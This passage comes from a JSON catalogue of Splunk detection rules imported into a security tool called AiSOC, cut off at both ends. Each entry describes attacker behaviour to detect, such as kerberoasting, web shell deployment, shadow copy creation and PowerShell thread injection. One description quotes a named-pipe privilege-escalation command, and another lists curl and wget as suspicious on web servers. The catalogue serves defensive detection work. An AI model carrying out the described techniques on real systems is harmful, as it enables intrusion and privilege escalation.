"eac4de87-7a56-4538-a21b-277897af6d8d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_application_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-eac5e8ba-4857-11ec-9371-acde48001122", "type": "detection", "name": "Loading Of Dynwrapx Module", "description": "The following analytic detects the loading of the dynwrapx.dll module, which is associated with the DynamicWrapperX ActiveX component. This detection leverages Sysmon EventCode 7 to identify processes that load or register dynwrapx.dll. This activity is significant because DynamicWrapperX can be used to call Windows API functions in scripts, making it a potential tool for malicious actions. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence on the host. Immediate investigation of parallel processes and registry modifications is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/loading-of-dynwrapx-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eac5e8ba-4857-11ec-9371-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/loading_of_dynwrapx_module.yml" } }, { "id": "splunk-security-content-eaf688b3-bb8f-454d-b105-920a862cd8cb", "type": "detection", "name": "Windows Default Group Policy Object Modified with GPME", "description": "The following analytic detects modifications to default Group Policy Objects (GPOs) using the Group Policy Management Editor (GPME). It leverages the Endpoint data model to identify processes where `mmc.exe` executes `gpme.msc` with specific GUIDs related to default GPOs. This activity is significant because default GPOs, such as the `Default Domain Controllers Policy` and `Default Domain Policy`, are critical for enforcing security policies across the domain. If malicious, such modifications could allow an attacker to gain further access, establish persistence, or deploy malware across numerous hosts, severely compromising the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-group-policy-object-modified-with-gpme.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eaf688b3-bb8f-454d-b105-920a862cd8cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml" } }, { "id": "splunk-security-content-eb120f5f-b879-4a63-97c1-93352b5df844", "type": "detection", "name": "Creation of Shadow Copy", "description": "The following analytic detects the creation of shadow copies using Vssadmin or Wmic. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because creating shadow copies can be a precursor to ransomware attacks or data exfiltration, allowing attackers to bypass file locks and access sensitive data. If confirmed malicious, this behavior could enable attackers to maintain persistence, recover deleted files, or prepare for further malicious activities, posing a significant risk to the integrity and confidentiality of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb120f5f-b879-4a63-97c1-93352b5df844", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_shadow_copy.yml" } }, { "id": "splunk-security-content-eb277ba0-b96b-11eb-b00e-acde48001122", "type": "detection", "name": "CMD Echo Pipe - Escalation", "description": "The following analytic identifies the use of named-pipe impersonation for privilege escalation, commonly associated with Cobalt Strike and similar frameworks. It detects command-line executions where `cmd.exe` uses `echo` to write to a named pipe, such as `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant as it indicates potential privilege escalation attempts. If confirmed malicious, attackers could gain elevated privileges, enabling further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmd-echo-pipe-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb277ba0-b96b-11eb-b00e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmd_echo_pipe___escalation.yml" } }, { "id": "splunk-security-content-eb3e6702-8936-11ec-98fe-acde48001122", "type": "detection", "name": "Unusual Number of Kerberos Service Tickets Requested", "description": "The following analytic identifies an unusual number of Kerberos service ticket requests, potentially indicating a kerberoasting attack. It leverages Kerberos Event 4769 and calculates the standard deviation for each host, using the 3-sigma rule to detect anomalies. This activity is significant as kerberoasting allows adversaries to request service tickets and crack them offline, potentially gaining privileged access to the domain. If confirmed malicious, this could lead to unauthorized access to sensitive accounts and escalation of privileges within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusual-number-of-kerberos-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb3e6702-8936-11ec-98fe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusual_number_of_kerberos_service_tickets_requested.yml" } }, { "id": "splunk-security-content-eb59cf01-1874-4d16-b7e4-54a6eb9b3118", "type": "detection", "name": "Windows Proxy Execution of .NET Utilities via Scripts", "description": "The following analytic detects the launch of common .NET-related utilities\u2014aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, or vbc.exe when the parent appears to be a script (batch, CMD, PowerShell, JScript, VBScript, or HTML) running from an unusual or user-writable Windows location (for example Public, Temp, Fonts, Debug, Recycle Bin, Prefetch, or similar paths), and the child process shows little or no command-line variation from the image path or name.\nThat pattern is consistent with adversaries using trusted .NET binaries as a proxy to run code while hiding execution behind script parents in low-trust folders, behavior associated with techniques such as signed binary proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-execution-of-net-utilities-via-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb59cf01-1874-4d16-b7e4-54a6eb9b3118", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_execution_of__net_utilities_via_scripts.yml" } }, { "id": "splunk-security-content-eb65619c-4f8d-4383-a975-d352765d344b", "type": "detection", "name": "Java Writing JSP File", "description": "The following analytic detects the Java process writing a .jsp file to disk, which may indicate a web shell being deployed. It leverages data from the Endpoint datamodel, specifically monitoring process and filesystem activities. This activity is significant because web shells can provide attackers with remote control over the compromised server, leading to further exploitation. If confirmed malicious, this could allow unauthorized access, data exfiltration, or further compromise of the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/java-writing-jsp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eb65619c-4f8d-4383-a975-d352765d344b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/java_writing_jsp_file.yml" } }, { "id": "splunk-security-content-ec102cb2-a0f5-11eb-9b38-acde48001122", "type": "detection", "name": "Powershell Remote Thread To Known Windows Process", "description": "The following analytic detects suspicious PowerShell processes attempting to inject code into critical Windows processes using CreateRemoteThread. It leverages Sysmon EventCode 8 to identify instances where PowerShell spawns threads in processes like svchost.exe, csrss.exe, and others. This activity is significant as it is commonly used by malware such as TrickBot and offensive tools like Cobalt Strike to execute malicious payloads, establish reverse shells, or download additional malware. If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remote-thread-to-known-windows-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec102cb2-a0f5-11eb-9b38-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remote_thread_to_known_windows_process.yml" } }, { "id": "splunk-security-content-ec3a9362-92fe-11eb-99d0-acde48001122", "type": "detection", "name": "AWS IAM Delete Policy", "description": "The following analytic detects the deletion of an IAM policy in AWS. It leverages AWS CloudTrail logs to identify `DeletePolicy` events, excluding those from AWS internal services. This activity is significant as unauthorized policy deletions can disrupt access controls and weaken security postures. If confirmed malicious, an attacker could remove critical security policies, potentially leading to privilege escalation, unauthorized access, or data exfiltration. Monitoring this behavior helps ensure that only authorized changes are made to IAM policies, maintaining the integrity and security of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-delete-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec3a9362-92fe-11eb-99d0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_delete_policy.yml" } }, { "id": "splunk-security-content-ec3b7601-689a-4463-94e0-c9f45638efb9", "type": "detection", "name": "Web Servers Executing Suspicious Processes", "description": "The following analytic detects the execution of suspicious processes on systems identified as web servers. It leverages the Splunk data model \"Endpoint.Processes\" to search for specific process names such as \"whoami\", \"ping\", \"iptables\", \"wget\", \"service\", and \"curl\". This activity is significant because these processes are often used by attackers for reconnaissance, persistence, or data exfiltration. If confirmed malicious, this could lead to data theft, deployment of additional malware, or even ransomware attacks. Immediate investigation is required to determine the legitimacy of the activity and mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-servers-executing-suspicious-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec3b7601-689a-4463-94e0-c9f45638efb9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/web_servers_executing_suspicious_processes.yml" } }, { "id": "splunk-security-content-ec5b6790-595a-4fb8-ad43-56e5b55a9617", "type": "detection", "name": "Windows AD Dangerous User ACL Modification", "description": "This detection monitors the addition of the following ACLs to an Active Directory user object: \"Full control\",\"All extended rights\",\"All validated writes\", \"Create all child objects\",\"Delete all child objects\",\"Delete subtree\",\"Delete\",\"Modify permissions\",\"Modify owner\",\"Write all properties\". Such modifications can indicate potential privilege escalation or malicious activity. Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-user-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec5b6790-595a-4fb8-ad43-56e5b55a9617", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_user_acl_modification.yml" } }, { "id": "splunk-security-content-ec99bb81-c31b-4837-8c7d-1b32aa70b337", "type": "detection", "name": "Cisco Secure Firewall - High Priority Intrusion Classification", "description": "This analytic identifies high-severity intrusion events based on the classification assigned to Snort rules within Cisco Secure Firewall logs.\nIt leverages Cisco Secure Firewall Threat Defense logs and focuses on events classified as:\n\n- A Network Trojan was Detected\n- Successful Administrator Privilege Gain\n- Successful User Privilege Gain\n- Attempt to Login By a Default Username and Password\n- Known malware command and control traffic\n- Known malicious file or file based exploit\n- Known client side exploit attempt\n- Large Scale Information Leak\"\n\nThese classifications typically represent significant threats such as remote code execution, credential theft, lateral movement, or malware communication. Detection of these classifications should be prioritized for immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1003", "T1071", "T1190", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-priority-intrusion-classification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ec99bb81-c31b-4837-8c7d-1b32aa70b337", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_priority_intrusion_classification.yml" } }, { "id": "splunk-security-content-ecddae4e-3d4b-41e2-b3df-e46a88b38521", "type": "detection", "name": "Windows Suspicious Process File Path", "description": "The following analytic identifies processes running from file paths not typically associated with legitimate software. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process paths within the Endpoint data model. This activity is significant because adversaries often use unconventional file paths to execute malicious code without requiring administrative privileges. If confirmed malicious, this behavior could indicate an attempt to bypass security controls, leading to unauthorized software execution, potential system compromise, and further malicious activities within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ecddae4e-3d4b-41e2-b3df-e46a88b38521", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_process_file_path.yml" } }, { "id": "splunk-security-content-ed06725f-6da6-439f-9dcc-ab30e891297c", "type": "detection", "name": "Windows PowerShell Export PfxCertificate", "description": "The following analytic detects the use of the PowerShell cmdlet `export-pfxcertificate` by leveraging Script Block Logging. This activity is significant as it may indicate an adversary attempting to exfiltrate certificates from the Windows Certificate Store. Monitoring this behavior is crucial for identifying potential certificate theft, which can lead to unauthorized access and impersonation attacks. If confirmed malicious, this activity could allow attackers to compromise secure communications, authenticate as legitimate users, and escalate their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-export-pfxcertificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed06725f-6da6-439f-9dcc-ab30e891297c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_export_pfxcertificate.yml" } }, { "id": "splunk-security-content-ed313326-a0f9-11eb-a89c-acde48001122", "type": "detection", "name": "Wermgr Process Connecting To IP Check Web Services", "description": "The following analytic detects the wermgr.exe process attempting to connect to known IP check web services. It leverages Sysmon EventCode 22 to identify DNS queries made by wermgr.exe to specific IP check services. This activity is significant because wermgr.exe is typically used for Windows error reporting, and its connection to these services may indicate malicious code injection, often associated with malware like Trickbot. If confirmed malicious, this behavior could allow attackers to recon the infected machine's IP address, aiding in further exploitation and evasion tactics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wermgr-process-connecting-to-ip-check-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed313326-a0f9-11eb-a89c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/wermgr_process_connecting_to_ip_check_web_services.yml" } }, { "id": "splunk-security-content-ed4eeacb-8d5a-488e-bc97-1ce6ded63b84", "type": "detection", "name": "Windows Modify Registry Disable Toast Notifications", "description": "The following analytic detects modifications to the Windows registry that disable toast notifications. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled*\" with a value set to \"0x00000000\". This activity is significant because disabling toast notifications can prevent users from receiving critical system and application updates, which adversaries like Azorult exploit for defense evasion. If confirmed malicious, this action could allow attackers to operate undetected, leading to prolonged persistence and potential further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-toast-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed4eeacb-8d5a-488e-bc97-1ce6ded63b84", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_toast_notifications.yml" } }, { "id": "splunk-security-content-ed550c19-712e-43f6-bd19-6f58f61b3a5e", "type": "detection", "name": "GetDomainComputer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize `Get-DomainComputer` to discover remote systems. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as `Get-DomainComputer` is part of PowerView, a tool often used by adversaries for domain enumeration and situational awareness. If confirmed malicious, this activity could allow attackers to map out the network, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincomputer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed550c19-712e-43f6-bd19-6f58f61b3a5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincomputer_with_powershell.yml" } }, { "id": "splunk-security-content-ed76ce37-bab9-4ec0-bf3e-9c6a6cf43365", "type": "detection", "name": "Zscaler CryptoMiner Downloaded Threat Blocked", "description": "The following analytic identifies attempts to download cryptomining software that are blocked by Zscaler. It leverages web proxy logs to detect blocked actions associated with cryptominer threats, analyzing key data points such as device owner, user, URL category, destination URL, and IP. This activity is significant for a SOC as it helps in early identification and mitigation of cryptomining activities, which can compromise network integrity and resource availability. If confirmed malicious, this activity could lead to unauthorized use of network resources for cryptomining, potentially degrading system performance and increasing operational costs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-cryptominer-downloaded-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ed76ce37-bab9-4ec0-bf3e-9c6a6cf43365", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_cryptominer_downloaded_threat_blocked.yml" } }, { "id": "splunk-security-content-edb930df-64c2-4bb7-9b5c-889ed53fb973", "type": "detection", "name": "Windows Post Exploitation Risk Behavior", "description": "The following analytic identifies four or more distinct post-exploitation behaviors on a Windows system. It leverages data from the Risk data model in Splunk Enterprise Security, focusing on multiple risk events and their associated MITRE ATT&CK tactics and techniques. This activity is significant as it indicates potential malicious actions following an initial compromise, such as persistence, privilege escalation, or data exfiltration. If confirmed malicious, this behavior could allow attackers to maintain control, escalate privileges, and further exploit the compromised environment, leading to significant security breaches and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1049", "T1069", "T1016", "T1003", "T1082", "T1115", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-post-exploitation-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "edb930df-64c2-4bb7-9b5c-889ed53fb973", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_post_exploitation_risk_behavior.yml" } }, { "id": "splunk-security-content-eddbf5ba-b89e-47ca-995e-2d259804e55e", "type": "detection", "name": "Windows Account Discovery for None Disable User Account", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser with the UACFilter parameter set to NOT_ACCOUNTDISABLE, indicating an attempt to enumerate Active Directory user accounts that are not disabled. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify the specific script block text. Monitoring this activity is significant as it may indicate reconnaissance efforts by an attacker to identify active user accounts for further exploitation. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-for-none-disable-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "eddbf5ba-b89e-47ca-995e-2d259804e55e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_for_none_disable_user_account.yml" } }, { "id": "splunk-security-content-ee18ed37-0802-4268-9435-b3b91aaa18db", "type": "detection", "name": "PowerShell - Connect To Internet With Hidden Window", "description": "The following analytic detects PowerShell commands using the WindowStyle parameter to hide the window while connecting to the Internet. This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions that include variations of the WindowStyle parameter. This activity is significant because it attempts to bypass default PowerShell execution policies and conceal its actions, which is often indicative of malicious intent. If confirmed malicious, this could allow an attacker to execute commands stealthily, potentially leading to unauthorized data exfiltration or further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-connect-to-internet-with-hidden-window.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee18ed37-0802-4268-9435-b3b91aaa18db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml" } }, { "id": "splunk-security-content-ee301e1e-cd81-4011-a911-e5f049b9e3d5", "type": "detection", "name": "Windows Anonymous Pipe Activity", "description": "The following analytic detects the creation or connection of anonymous pipes for inter-process communication (IPC) within a Windows environment. Anonymous pipes are commonly used by legitimate system processes, services, and applications to transfer data between related processes. However, adversaries frequently abuse anonymous pipes to facilitate stealthy process injection, command-and-control (C2) communication, credential theft, or privilege escalation. This detection monitors for unusual anonymous pipe activity, particularly involving non-system processes, unsigned executables, or unexpected parent-child process relationships. While legitimate use cases exist\u2014such as Windows services, software installers, or security tools\u2014unusual or high-frequency anonymous pipe activity should be investigated for potential malware, persistence mechanisms, or lateral movement techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-anonymous-pipe-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee301e1e-cd81-4011-a911-e5f049b9e3d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_anonymous_pipe_activity.yml" } }, { "id": "splunk-security-content-ee54241e-0815-4423-9729-e1f5dfc402de", "type": "detection", "name": "Windows Excel Spawning Microsoft Project Application", "description": "The following analytic identifies the execution of uncommon Microsoft application executables as child processes of Microsoft Excel.\nUnder normal conditions, Excel primarily spawns internal Office-related processes, and the creation of executables such as WINPROJ.EXE, FOXPROW.exe, or SCHDPLUS.exe is uncommon in typical business workflows.\nAdversaries may abuse this behavior to blend malicious activity within trusted applications, execute unauthorized code, or bypass application control mechanisms.\nThis technique aligns with common tradecraft where Office applications are leveraged as initial access or execution vectors due to their prevalence in enterprise environments.\nDetecting this relationship helps defenders spot suspicious child processes that may indicate malware execution, persistence mechanisms, or attempts to establish command-and-control.\nSecurity teams should investigate the parent Excel process, the context of the ActivateMicrosoftApp() execution, and any subsequent network or file activity.\nWhile certain legitimate Office features could trigger this process in specific environments, its occurrence generally warrants further scrutiny to validate intent and rule out compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excel-spawning-microsoft-project-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ee54241e-0815-4423-9729-e1f5dfc402de", "source_commit": "4d4c7ee", 